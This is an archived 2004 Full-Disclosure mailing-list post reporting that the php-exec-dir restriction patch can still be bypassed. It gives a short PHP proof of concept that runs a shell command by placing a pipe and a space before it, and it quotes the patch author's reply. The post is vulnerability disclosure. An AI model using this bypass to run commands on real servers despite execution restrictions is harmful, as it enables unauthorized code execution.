[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] php-exec-dir vulnerable after latest upgrade

To: "C. McCohy" <mccohy@xxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] php-exec-dir vulnerable after latest upgrade
From: "VeNoMouS" <venom@xxxxxxxxxxx>
Date: Thu, 8 Jul 2004 13:05:24 +1200

<?php

$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>

^^ do a |<space>ps exploits it again

i my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside it and i was still able to execute it, you HAVE to do the space after the pipe '|'.

----- Original Message ----- From: "C. McCohy" <mccohy@xxxxxxxxxxxx> To: "VeNoMouS" <venom@xxxxxxxxxxx> Sent: Wednesday, July 07, 2004 9:43 PM Subject: Re: php-exec-dir vulnerable?

Ok I fixed all patches to all previous and current versions of the patch,
description can be found on the project homepage
http://kyberdigi.cz/projects/execdir/

Please inform all internet groups you have informed about the bug before.

--
Baj ... C. McCohy

While you are reading this text, an essential hacking tool
is being silently installed on your computer.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- [Full-Disclosure] Re: php-exec-dir vulnerable after latest upgrade
  - From: C. McCohy

Prev by Date: RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug
Next by Date: [Full-Disclosure] Nokia 3560 Remote DOS
Previous by thread: RE: [Full-Disclosure] Microsoft hides certain types of files from your eyes + some filename parsing bug
Next by thread: [Full-Disclosure] Re: php-exec-dir vulnerable after latest upgrade
Index(es):
- Date
- Thread